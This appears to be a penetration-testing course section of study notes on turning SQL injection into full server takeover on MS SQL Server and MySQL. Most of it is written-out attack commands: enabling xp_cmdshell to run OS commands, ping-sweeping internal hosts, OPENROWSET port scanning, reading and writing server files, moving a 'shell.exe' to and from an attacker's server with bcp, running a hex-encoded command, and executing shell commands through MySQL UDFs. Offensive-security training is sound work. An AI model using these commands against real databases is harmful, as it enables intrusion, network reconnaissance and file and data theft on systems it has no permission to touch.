5.4.8 From SQLi to Server Takeover

From SQLi to Server Takeover

In this section, advanced features provided by MS SQL Server and MySQL are explored, revealing how these features can be exploited to gain access to the DBMS server machine.

Advanced SQL Server Exploitation

xp_cmdshell:

• xp_cmdshell is a stored procedure in SQL Server that provides advanced features.

• To run an OS command: EXEC master..xp_cmdshell '<command>'

• Not enabled by default, requires sa privileges.

• Enable and disable:

  EXEC sp_configure 'show advanced options', 1;
  RECONFIGURE;
  EXEC sp_configure 'xp_cmdshell', 1;
  RECONFIGURE;
  
  -- After tests
  EXEC sp_configure 'xp_cmdshell', 0;
  EXEC sp_configure 'show advanced options', 0;
  RECONFIGURE;

Internal Network Host Enumeration

• Use xp_cmdshell to launch commands.

• Ping command: EXEC master.dbo.xp_cmdshell 'ping <target IP address>'

• Use execution time to infer ping result.

Port Scanning (OPENROWSET)

• Use OPENROWSET for remote server table access.

• Exploit for port scanning:

  SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sas;pwd=something;Network=DBMSSOCN;Address=<target IP>,<target port>;timeout=<connection timeout in seconds>', 'select 1')--

• Detect open/closed ports based on error messages.

Reading the File System

• Use EXEC master..xp_cmdshell 'dir <target directory>' to list directory contents.

• Save output to a web-accessible folder or read a file and put content into a table for extraction.

Uploading Files

• Insert file into a table in the MS SQL database.

  CREATE TABLE HelperTable (file text)
  BULK INSERT HelperTable FROM 'shell.exe' WITH (codepage='RAW')

• Retrieve it from our server:

  EXEC xp_cmdshell 'bcp "SELECT * FROM HelperTable" queryout shell.exe -c -Craw -S<our server address> -I<out server username> -P<our server password>'

Storing Command Results into a Temporary Table

• Create a temporary table to hold stored procedure output:

  CREATE TABLE temptable (id int not null identity (1,1), output nvarchar(4096) null);

• Craft argument for xp_cmdshell.

• Execute command and store results:

  declare @t nvarchar(4096) set @t=0x640069007200200063003a005c00 insert into temptable (output) EXEC master.dbo.xp_cmdshell @t;

Conclusion:

• Advanced SQL Server exploitation involves leveraging features like xp_cmdshell for OS command execution, internal network host enumeration, port scanning, reading the file system, uploading and downloading files, and storing command results for further analysis.

Advanced MySQL Exploitation

Reading the File System:

• Use LOAD_FILE('<text file path>') to read files.

• For binary files: SELECT HEX(LOAD_FILE('<text file path>')).

Uploading Files:

• Use SELECT ... INTO DUMPFILE to write query results to a file.

  SELECT <fields> FROM <table> INTO DUMPFILE '<output file path>';

• Convert binary file to hex-string and upload.

Executing Shell Commands:

• MySQL doesn't provide a direct method for running shell commands.

• Use User Defined Functions (UDF) for custom functions like sys_eval and sys_exec.

• Upload shared objects (SO) or dynamic-link library (DLL) files to the target server.

• Execute commands:

  SELECT sys_eval('<command>')
  SELECT sys_exec('<command>')

Conclusion:

• Advanced MySQL exploitation includes reading the file system, uploading files, and executing shell commands using User Defined Functions (UDFs).